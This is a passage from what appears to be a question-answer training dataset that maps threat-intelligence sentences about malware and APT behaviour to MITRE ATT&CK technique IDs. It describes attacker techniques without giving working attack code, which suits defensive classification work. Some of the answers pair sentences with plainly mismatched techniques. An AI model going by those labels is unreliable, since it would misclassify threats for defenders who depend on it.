attempt to deliver messaging, intimidate, or otherwise mislead an organization or users.### Assistant: T1491: Defacement" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windshift has used fake personas on social media to engage and target victims.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Smoke Loader recursively searches through directories for files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gazer can establish persistence by creating a scheduled task.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By default, the passphrase for the keychain is the user’s logon credentials.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Raindrop used a custom packer for its Cobalt Strike payload, which was compressed using the LZMA algorithm.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With these outputs, FIN6 was able to identify user accounts that could access additional hosts in the domain### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Exaramel for Windows dropper creates and starts a Windows service named wsmprovav with the description “Windows Check AV.” WannaCry creates the service ""mssecsvc2.0"" with the display name ""Microsoft Security Center Service.""### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 places scripts in the startup folder for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The PowerShell script collects all possible information on the user and the network, including snapshots, computer and user names, emails from registry, tasks in task scheduler, system information, AVs registered in the system, privileges, domain and workgroup information### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Process injection helps the malware avoid detection; however, review of active network connections show notepad.exe communicating to 185### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum was seen using modified Quarks PwDump to perform credential dumping.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The original variant of FakeM encrypts C2 traffic using a custom encryption cipher that uses an XOR key of “YHCRA” and bit rotation between each XOR operation.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Catchamas gathers the Mac address, IP address, and the network adapter information from the victim’s machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has sent e-mails with malicious attachments often crafted for specific targets.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The shellcode retrieves an additional payload by connecting to the following C2 server using DNS: aaa.stage.14919005.www1.proslr3[.]com Once a successful reply is received from the command and control (C2) server, the PowerShell script executes the embedded Cobalt Strike shellcode### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth collects the external IP address from the system.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ObliqueRAT has gained execution on targeted systems through luring users to click on links to malicious URLs.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gallmaker attempted to exploit Microsoft’s DDE protocol in order to gain access to victim machines and for execution.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 likely used COVID-19-themed malicious attachments against Chinese speaking targets.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang gathered information and files from local directories for exfiltration.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nomadic Octopus has targeted victims with spearphishing emails containing malicious attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.### Assistant: T1597: Search Closed Sources" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GPP are tools that allow administrators to create domain policies with embedded credentials.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has added paths to executables in the Registry to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerDuke hides many of its backdoor payloads in an alternate data stream .### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bad Rabbit spread through watering holes on popular sites by injecting JavaScript into the HTML body or a .js file.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary Template Injection, or place a specially crafted file on navigation path for privileged accounts or on a publicly accessible share to be accessed by victim.### Assistant: T1187: Forced Authentication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NativeZone has checked if Vmware or VirtualBox VM is running on a compromised host.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST removed IFEO values to clean up traces of execution.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used credential dumping tool named VALUEVAULT to steal credentials from the Windows Credential Manager.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has downloaded additional scripts that build and run Monero cryptocurrency miners.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Octopus can download additional files and tools onto the victim’s machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 used WMI to steal credentials and execute backdoors at a future time.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Calisto has the capability to upload and download files to the victim's machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Linfo creates a backdoor through which remote attackers can change the frequency at which compromised hosts contact remote C2 infrastructure.### Assistant: T1029: Scheduled Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has created new domain accounts on an ICS access server.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy .### Assistant: T1201: Password Policy Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ROKRAT checks for debugging tools.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SynAck gathers computer names, OS version info, and also checks installed keyboard layouts to estimate if it has been launched from a certain list of countries.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ferocious Kitten has used right-to-left override to reverse executables’ names to make them appear to have different file extensions, rather than their real ones.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Often Valid Accounts are required, along with access to the remote system's SMB/Windows Admin Shares for RPC communication.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used net share and net view to identify network shares of interest.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Deep Panda uses Web shells on publicly accessible Web servers to access victim networks.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT34 has used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wiarp creates a backdoor through which remote attackers can open a command line interface.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA459 has a VBScript for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Goopy has impersonated the legitimate goopdate.dll, which was dropped on the target system with a legitimate GoogleUpdate.exe.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HARDRAIN uses FakeTLS to communicate with its C2 server.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elise injects DLL files into iexplore.exe.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sometimes these credentials are used for automatic logons.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Thrip has obtained and used tools such as Mimikatz and PsExec.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may check for Internet connectivity on compromised systems.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use DGAs for the purpose of Fallback Channels.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.### Assistant: T1599: Network Boundary Bridging" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADNEWS can use multiple C2 channels, including RSS feeds, Github, forums, and blogs.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly created accounts that appeared to be tailored to each individual staging target.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Other techniques such as Dynamic Linker Hijacking may be used to populate a target process with more available gadgets.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has used sslip.io, a free IP to domain mapping service that also makes SSL certificate generation easier for traffic encryption, as part of their command and control.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT enumerates the victim operating system and computer name during the initial infection.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkComet can launch a remote shell to execute commands on the victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,System time information may be gathered in a number of ways, such as with Net on Windows by performing net time \\hostname to gather the system time on a remote system.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEXTMATE uses DNS TXT records for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay can use scheduled tasks to achieve persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete uses the netsh wlan show networks mode=bssid and netsh wlan show interfaces commands to list all nearby WiFi networks and connected interfaces.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DownPaper uses PowerShell for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used ProcDump to dump credentials from memory.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork has obtained and used open-source tools such as QuasarRAT.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST added junk bytes to its C2 over HTTP.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Excel does not have a template file created by default, but one can be added that will automatically be loaded.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The encryption/decryption routine (refer to Figure 5) can be summarized as follows: Figure 5: Encryption/ Decryption Function Generate an array of integers from 0x00 to 0xff Scrambles the state of the table using the given key Encrypts or decrypts a string using the scrambled table from (b)### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use Windows Dynamic Data Exchange to execute arbitrary commands.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The decrypted contents of the log file adhere to the format in Figure 22### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany can use netstat to collect a list of network connections.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Threat Group-3390 tool can create a new Registry key under HKEY_CURRENT_USER\Software\Classes\.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar uses FTP and FTPS to communicate with the C2 server.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hydraq includes a component based on the code of VNC that can stream a live feed of the desktop of an infected host.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Blue Mockingbird has obtained and used tools such as Mimikatz.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER may enumerate user directories on a victim.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoxCaon can download files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has a tool that can delete files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN4 has created rules in victims' Microsoft Outlook accounts to automatically delete emails containing words such as “hacked,"" ""phish,"" and “malware"" in a likely attempt to prevent organizations from communicating about their activities.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Because of Poseidon’s longevity, there are samples targeting Windows systems as early as Windows NT 4.0 Server and Windows 95 Workstation up to current versions like Windows 8.1, as well as server variants (very important to them, given the emphasis on reaching Domain Controllers in corporate environments.) How is this different from any other targeted attack? The extortion elements of this campaign are what set it apart from others### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may rely upon a user clicking a malicious link in order to divulge information or to gain execution, as in Malicious Link.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the installed product is on a predetermined list, the dropper will exit.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy searches for files that are 60mb and less and contain the following extensions: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .exe, .zip, and .rar.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanoCore can modify the victim's anti-virus.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has obfuscated binary strings including the use of XOR encryption and Base64 encoding.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MacSpy can record the sounds from microphones on a computer.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,While all payloads can be dynamically updated, at the time of delivery, this task launched a COM scriptlet (“.sct” file extension) that downloaded and executed Meterpreter hosted on images.chinabytes[.]info### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson can decode its encoded PE file prior to execution.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also can delete temporary files and itself after the initial script executes.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used Tor and a variety of commercial VPN services to route brute force authentication attempts.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis collects OS information and the computer name from the victim’s machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp has queued an APC routine to explorer.exe by calling ZwQueueApcThread.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT can search a list of running processes for Tr.exe.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The executable attempts to download a couple of files from different sources and saves them in the AppData and Startup folders for persistence, then invokes the first downloaded file – Picture2.exe### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to hide artifacts associated with their behaviors to evade detection.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After data is collected by Stealth Falcon malware, it is exfiltrated over the existing C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has gathered the SYSTEM registry and ntds.dit files from target systems.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 staged data and files in password-protected archives on a victim's OWA server.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Whitefly has encrypted the payload used for C2.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has scanned for open ports and used nbtscan to find NETBIOS nameservers.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This command is particularly interesting as it enables an alternative command and control channel that uses the Google Drive API### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After loading the keyword and phone data files, MESSAGETAP begins monitoring all network connections to and from the victim server.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze has attempted to delete the shadow volumes of infected machines, once before and once after the encryption process.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KillDisk has used the FindNextFile command as part of its file deletion process.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The RunAtLoad key will command launchd to run the daemon when the operating system starts up, while the KeepAlive key will command launchd to let the process run indefinitely### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CostaRicto has used a layer of proxies to manage C2 communications.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has used HTTP in communication with the C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleJeus has added a leading .### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Octopus can exfiltrate files from the system using a documents collector tool.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Standard file systems include FAT, NTFS, ext4, and APFS.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerStallion uses PowerShell loops to iteratively check for available commands in its OneDrive C2 server.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.### Assistant: T1185: Browser Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has registered domains to spoof targeted organizations and trusted third parties.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This system configuration file (in.sys) will drop a backdoor installer (UserInstall.exe) then delete itself### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete produces file listings in order to search for files to be exfiltrated.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has used the Plink utility to create SSH tunnels.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conti can stop up to 146 Windows services related to security, backup, database, and email solutions through the use of net stop.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BadPatch uses WMI to enumerate installed security products in the victim’s environment.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JPIN can enumerate Registry keys.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework., net config### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has the ability to capture input on the compromised host via keylogging.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SYNful Knock is malware that is inserted into a network device by patching the operating system image.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DCSync functionality has been included in the ""lsadump"" module in Mimikatz.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RedLeaves can capture screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has placed scripts in the startup folder for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There have been notable incidents where internal spearphishing has been used.### Assistant: T1534: Internal Spearphishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT1 has used the Windows command shell to execute commands, and batch scripting to automate execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avenger has the ability to use Tasklist to identify running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The shellcode of the embedded object is designed to download an image, which is, in fact, a new shellcode used to decode an embedded executable### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pysa has executed a malicious executable by naming it svchost.exe.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has used RAR to create password-protected archives of collected documents prior to exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gathering this information may reveal opportunities for other forms of reconnaissance or Phishing for Information, establishing operational resources , and/or initial access or Valid Accounts.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\remote address\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials.### Assistant: T1187: Forced Authentication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany can capture information regarding the victim's OS, security, and hardware configuration.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Data from these solutions can be retrieved directly using the cloud provider's APIs.### Assistant: T1530: Data from Cloud Storage Object" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used WMI and LDAP queries for network discovery and to move laterally.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Final1stspy uses HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEMP.Veles has relied on encrypted SSH-based tunnels to transfer tools and for remote command/program execution.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Solution providers typically offer security guides to help end users configure systems.### Assistant: T1530: Data from Cloud Storage Object" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KGH_SPY has masqueraded as a legitimate Windows tool.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor has disabled Windows Defender to evade protections.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar stages command output and collected data in files before exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has also used a Kubernetes cluster to conduct distributed, large-scale password spray attacks.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 added ""junk data"" to each encoded string, preventing trivial decoding without knowledge of the junk removal algorithm.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet extracts and writes driver files that match the times of other legitimate files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot has the ability to check running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes has exfiltrated its collected data from the infected machine to the C2, sometimes using the MIME protocol.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ISMInjector uses the certutil command to decode a payload file.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dyre has the ability to identify running services on a compromised host.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI creates a shortcut called ""Anti virus service.lnk"" in an apparent attempt to masquerade as a legitimate file.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used file sharing services including OneHub to distribute tools.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OopsIE creates a scheduled task to run itself every three minutes.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Transparent Tribe has crafted malicious files to exploit CVE-2012-0158 and CVE-2010-3333 for execution.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar has used internal nodes on the compromised network for C2 communications.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,gh0st RAT uses RC4 and XOR to encrypt C2 traffic.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to steal web session cookies from Internet Explorer, Netscape Navigator, FireFox and RealNetworks applications.### Assistant: T1539: Steal Web Session Cookie" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TSCookie has been executed via malicious links embedded in e-mails spoofing the Ministries of Education, Culture, Sports, Science and Technology of Japan.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FlawedAmmyy may obfuscate portions of the initial C2 handshake.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoonWind obtains the number of removable drives from the victim.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kinsing was run through a deployed Ubuntu container.### Assistant: T1610: Deploy Container" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cherry Picker exfiltrates files over FTP.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Regin malware platform supports many standard protocols, including SMB.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Backdoor.Oldrea contains a cleanup module that removes traces of itself from the victim.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 used PowerShell scripts for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Turla Javascript backdoor added a local_update_check value under the Registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Based on comparison of Gazer versions, Turla made an effort to obfuscate strings in the malware that could be used as IoCs, including the mutex name and named pipe.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla surveys a system upon check-in to discover remote systems on a local network using the net view and net view /DOMAIN commands.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used several malicious applications that abused OAuth access tokens to gain access to target email accounts, including Gmail and Yahoo Mail.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbon enumerates values in the Registry.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic 